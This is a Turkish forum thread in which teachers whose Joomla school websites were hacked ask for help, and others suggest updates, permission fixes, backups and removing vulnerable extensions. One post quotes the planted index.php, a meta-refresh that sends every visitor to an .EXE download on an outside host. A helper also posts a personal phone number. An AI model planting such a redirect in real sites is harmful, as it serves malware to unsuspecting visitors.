Okul Sitemizi hacklemişler

Arkadaşlar joomla ile okul sitesi yaptım, pkklılar hacklemiş, sonra alanı aldığım yeri aradım, düzelttiler, Bu sefer yine hacklemişler, adres çubuğunun sonuna değişik bir adres ekleniyor, sayfa açılmıyor. Ne yapıcam? Aynı sorunla karşılaşan var mı?

link verirmisiniz? muhtemelen yazma izinleirnizden kaynaklanıyor. joomla güvenlik ayarlarını yapmalısınız.

Bir makale vardı arşivimde bulursam göndereceğim.

1- Sürüm yükseltme yapınız en güncel sürümü kurunuz.
2- yazma izinleirni ayarlayınız.
3- garanti olması açısından administrator klasörüne cpaneldne parola koyabilirisniz.

diğer ince ayralar şuan aklımda yok Zaten sevmem joomlayı

Hocam başınıza iş alabilirsiniz. Bence MEB in server larını kullanın.

www.incesuyibo.k12.tr adresimiz

Daha önce bir arkadaşın başına gelmişti ve milli eğitimle başı biraz ağrımıştı. Dikkatli olmak lazım ve milli eğitimin server'ı tercih edilirse daha az sorun yaşanır diye umuyorum :?

hocam 5307678301 beni arasanız yardımcı olayım gözünüzü korkutmayın halledilmeyecek bişey değildir.

hocam ftp den sitenize girin index dosyasına kod atmışlar ordan bi bakın dosyalarınıza
ve muhtemelen bileşenlerin birinde açık vardır ordan saldırmışlardır en son kurduğunuz bileşen veya modül varsa keldırın. Özellikle mezunlar bileşni falan kurduysanız onlarda açık var.

cpanele girin dns zone editor den serverinizin dns i ne yönlendirin

ah hocam ah yap html ile gec neden böyle işlere giriyorsunuz ki okul sitesine insan niye bakar bekar kız varmı die bide tayin isterken binalar fiziki yapı falan nasıl die...

hemen polise haber ver. Bir arkadaşımızın başına gelmiş. Bir de polisler sorguya çekmişler.

keyloger' Alıntı:

ah hocam ah yap html ile gec neden böyle işlere giriyorsunuz ki okul sitesine insan niye bakar bekar kız varmı die bide tayin isterken binalar fiziki yapı falan nasıl die...

Genişletmek için tıkla ...

Özürdiliyorum Konuyu açan arkadaşa, çünkü bu mesajı beğendim konudan alakası olmayarak bende evet demek istiyorum. Bekar kız varmı olayı orijinal olmuş

bana göre joomla zaten sıkıntı. ftp yi kontrol et.

arkadaşlar benimde sitemi pkk lılar hacklemişler 2 defa geri yükleme yaptım. ikisinde de farklı kişiler hacklemiş yönetim paneline şifre koydum.gene hacklenmiş ne yapabiliim bu anlatılanların dışında www.muharremunlu.name.tr

index.php'nin içeriği şu an şöyle...

<HTML><HEAD>
<META content=0;URL=king-orbit.com/ozan/aaaa.EXE http-equiv=refresh></HEAD>
<BODY></BODY></HTML>

eski index.php dosyasını tekrar at... herşey düzelir.

polise haber ver

ne isterler okul sitelerinden arkadaş, 3-4 yıl önce de bizim okul sitesine index atmışlardı silince düzelmişti.

muharremunlu75' Alıntı:

arkadaşlar benimde sitemi pkk lılar hacklemişler 2 defa geri yükleme yaptım. ikisinde de farklı kişiler hacklemiş yönetim paneline şifre koydum.gene hacklenmiş ne yapabiliim bu anlatılanların dışında http://www.muharremunlu.name.tr

Genişletmek için tıkla ...

Hack nasıl yapılıyor? Önce bunu düşünmek lazım.
Sitenizin herhangibir yerinden bir şekilde açık bulup sitenize sızıyorlar. Sızmak derken genelde bir dosya upload ediliyor ve bu dosya üzerinden hack yapılıyor. Hacklenen bir sitemde bu dosyalardan 2 çeşidini buldum ve inceledim inanın bu dosyayı hostunuza attıklarında eğer bunu bulup silmezseniz ne yaparsanız yapın yine hacklenirsiniz. Adamlar kapınızın anahtarını ele geçirmişler diledikleirnde girip hacklerler.

Aynı şekilde sitenize nereden sızdıklarınıda düşünmeniz gerek.

Mümkün olduğunca normal üyelere ve ziyaretçilere onaysız dosya gönderme imkanı vermeyn. REsim yükleme bile yapamasınlar. Çünkü resim yükleme yoluyla bile siteniz hacklenir.

Benim sitem hacklenirse ne yaparım?
1- site ftp yedeğini pc me indirirm.
2- veritabanı yedeğini indirirm.
3- Sitede yönlendrime varsa bunun veritabanına işlenerek mi? yoksa index atılarak mı yapıldığına bakarım.
4- veritabanına müdehale yapılmamışsa %90 yönetici şifrem çalınmamıştır.
5- Veritabanına müdehale varsa her şeyin yeniden değişmesi gerekir.
6- İndex atılmışsa açığı bulup kapattıktan sonra indexin orjinalini atmak problemi çözecektir.

ÖNERİLER: Sık sık yedek alın. Hatta sunucunuzda otomatik yedekleme varmı haftalık mı günlük mü aylıkmı olduğunu öğrenin. Yedeğinizi mutlaka pc nize indirin.
Hacklenirseniz panik yapmayın. Açığı olmayan site yoktur. Yok polise haber ver amcanı ara dayını ara gibi laflara itibar etmeyin. Polis ne yapacak sizin sitenize?

Hacklenirseniz ik işiniz sitenizi eski haline getirmek olsun. Bunun en kolay yolu açığı tespit etmek için o anki yedeği alıp pc nize indirdikten sonra hosting firmanızı arayıp eski yedeğinizi geri yükletmek olsun. En pratik budur.

Umarım ihtiyacınız olmaz..

Ha söyemeyi unuttum Joomla kullanıyorsanız açıklara da alışık olmalısınız.

Xoopsu Seviyorum...

serverinizden de kaynaklanıyo olabilir iyi bir firmadan almakta yarar var.
mesela natro, websahibi

hacklenen arkadaşlar joomlanın hangi versiyonlarını kullanıyorlar dı acaba?